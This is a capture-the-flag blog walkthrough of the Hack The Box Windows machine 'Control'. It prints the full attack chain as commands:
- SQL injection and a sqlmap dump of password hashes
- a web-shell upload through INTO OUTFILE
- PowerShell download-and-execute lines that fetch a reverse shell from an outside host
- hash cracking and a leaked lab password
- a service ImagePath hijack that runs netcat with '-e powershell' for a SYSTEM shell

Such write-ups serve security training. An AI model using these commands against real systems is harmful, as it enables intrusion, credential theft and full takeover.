Hey fellas!! This is Shreya Pohekar and today we’ll be walking through Control from Hackthebox. It was a hard windows machine. The initial foothold (wwwroot) to the machine exploited a sql injection, where I uploaded a web shell using the vulnerability. Getting to the user was pretty straightforward as the sqlmap listed password hashes. Privilege escalation to root required us to read through a powershell history file, that retrieved us interesting commands to query registry. The user had full control over the registry services, therefore it can be abused to get an administrator shell.
With all that said, Let’s dive in!!
Start with a nmap scan to find the open ports and services.
# nmap -sC -sV -o control.nmap 10.10.10.167
From the nmap scan, we can conclude that we might get our initial foothold from http.
So let’s jump onto the site, http://10.10.10.167 amd we get a page
There is a login button, but unfortunately, we cant access it. And it says to set up a proxy!!!!
But which IP to forward the request through??
So after viewing the page source of the launcher page, I found this!!
I got the IP to forward the request to. So setup burp and add the X-forwarded for header and the admin.php loads.
Scrolling through the page, option to create products,categories were implemented along with a search bar.
I found out that there was a SQL injection on the search bar, so I manually formed queries to find out the database, users, number of tables. And got the following result
The database was found to be warehouse and the user was the manager.
Alongside manual enumeration, I copied the request to a file, search.req and started a SQLMap.
# sqlmap -r search.req –all –batch
(–batch automates the yes/no prompt by sqlmap)
And found a lot of juicy stuff such as password to manager, password hash for hector and root.
And few other password hashes
After getting the password for the manager, I tried taking up the remote shells with evil-winrm, psexec.py, but it didn’t worked out. So now we need to somehow upload a shell on the box to get a reverse shell.
I got this blog that totally served the purpose.
But we need to find out where to upload the shell. As we know that the default document root for IIS web server is C:\inetpub\wwwroot, I tried that to upload the shell.
Since burp was continuously generating errors, I manipulated the payload I was using. And finally this payload worked
‘; select “<?php echo shell_exec($_GET[‘cmd’]);?>” into OUTFILE ‘C:\\inetpub\\wwwroot\\shell.php’;#
The file gets uploaded, still it generates a general error.
Time to take a reverse shell…
I used powercat.ps1 to obtain the reverse shell.
Just add a line to the end of the file, that is gonna execute the script.
Now go to the browser and write a command to grab the powercat.ps1 from the local machine
10.10.10.167/shells.php?cmd=powershell "iex(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1');"
Listen on port 443 for incoming connection and also setup a SimpleHTTPServer of python.
As the command on the browser executes, we get a shell.
Now grab winpeas.exe using the command:
WinPEAS did not return any interesting results.
But Alongside, sqlmap was completed and all the results were dumped to file inside /root/.sqlmap
I tried to crack the hashes that i previously obtained of hector and root using hashcat
Hash-identifier gave the following result
# hashcat --example-hashes | grep -i -B2 mysql
In which mode 300 looked similar to what hash-identifier identified
# hashcat --user -m 300 user_hashes /usr/share/wordlists/rockyou.txt --force
This command can be used if there are more than one password hashes and the format is :-
User:password_hash
And the password cracked for hector
Now Back to our windows machine, we again take a reverse shell with the creds of hector. This time we are creating a PSCredential which takes in username in plain text and password in encrypted format. This method is useful in the use case of login automation. You can read about PSCredential from here.
# $pass = ConvertTo-SecureString ‘l33th4x0rhector’ -Asplain -Force
# $cred = New-Object System.Management.Automation.PSCredential(‘.\hector’, $pass)
# $cred
The hostname of the machine is Fidelity. Check it out with #hostname
Now set up a python web server and spawn a nc listening on the specified port. The command below gives the reverse shell, but now with hector.
# invoke-command -Computer Fidelity -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1') }
Now we can grab our user.txt…
NOTE : Rlwrap nc -lnvp can be used in windows machine to get the arrow keys working
So now time to root!
Again I ran winPEAS.exe but didn’t find interesting results. Then got this file : PSReadline.
This is a powershell history file ( similar to bash_history in linux). On listing its contents, I found 2 commands relating to registry.
> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
The command lists all the services in the registry.
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
Property : {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Control
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 121
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 11
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
Property : {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Enum
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 17
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 27
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Hardware Profiles
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 3
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Policies
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 0
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Services
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 667
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Software
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 1
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
The get-acl cmdlet get you the security descriptor for a resource, such as a file or registry key. The Sddl contains the Access control of the resource.
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow -2147483648
S-1-5-32-549 Allow ReadKey
S-1-5-32-549 Allow -2147483648
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -2147483648
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
-2147483648
Audit :
Sddl : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
Based on the above 2 results, I found out that Hector has full control over registry.
As a note, commands lists SDDL’s. Security Descriptor Definition Language (SDDL) is a formal way to specify Microsoft Windows security descriptors or text strings that describe who owns various objects such as files in the system. The security descriptor may also provide an ACL for an object or its group.
# $acl = get-acl HKLM:\System\CurrentControlSet\Services
# ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}
So that’s a much readable form of hector having full control over the registry services.
# cd HKLM:
# cd SYSTEM\CurrentControlSet\Serivces
We need to find all the services running as LocalSystem, so that we can modify them and get a reverse shell as NT Authority.
The service (running as local system) should have startup type as manual and also we should have the permission to start and stop the service.
Start : 3 (Signifies manual mode)
ImagePath (This is from where the service loads the executables. Therefore we have to bind our shell here)
ObjectName : LocalSystem (advantage of running under the LocalSystem account is that the service has complete unrestricted access to local resources. )
Now, I’ll be sorting the services based upon the above three described parameters.
# cd SYSTEM\CurrentControlSet\Services
# $services = Get-ItemProperty -Path *
# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’)}
# $temp | select PSChildName | measure
# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’) -and ($_.Start -match ‘3’) }
# $temp | select PSChildName | measure
So after sorting, I found out that wuauserv (Windows Update Service) is one such service that matches the criteria. So let’s exploit!!
# sc.exe sdshow wuauserv
The images below show the SDDL set upon the wuauserv service, which makes it exploitable.
# ConvertFrom-SddlString -Sddl “D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)” | Foreach-Object {$_.DiscretionaryAcl}
Aftering querying the service we find out that it is stopped. That’s what we wanted because Hector dont have the permission to stop the running service.
Grab the nc64.exe from the local machine and paste it in C:\Windows\System32\spool\drivers\color\nc64.exe
Using:
wget http://10.10.14.81/nc64.exe -o nc64.exe
> set-itemProperty -path wuauserv -Name ImagePath -Value "C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.81 9001 -e powershell"
> get-item wuauserv (To check that our bind shell properly loaded)
# sc.exe start wuauserv
When we start the service, the binary in the ImagePath gets loaded and executed. In our case, nc.exe gets executed and connects to the listener that was spawned on the local machine using:
# nc -lnvp 9001
Yes it was a long way to go but the reward is worth it!!
That’s all for the blog post. Thanks for reading!!
Until then, Happy Hacking!!
For more such content subscribe to my page.
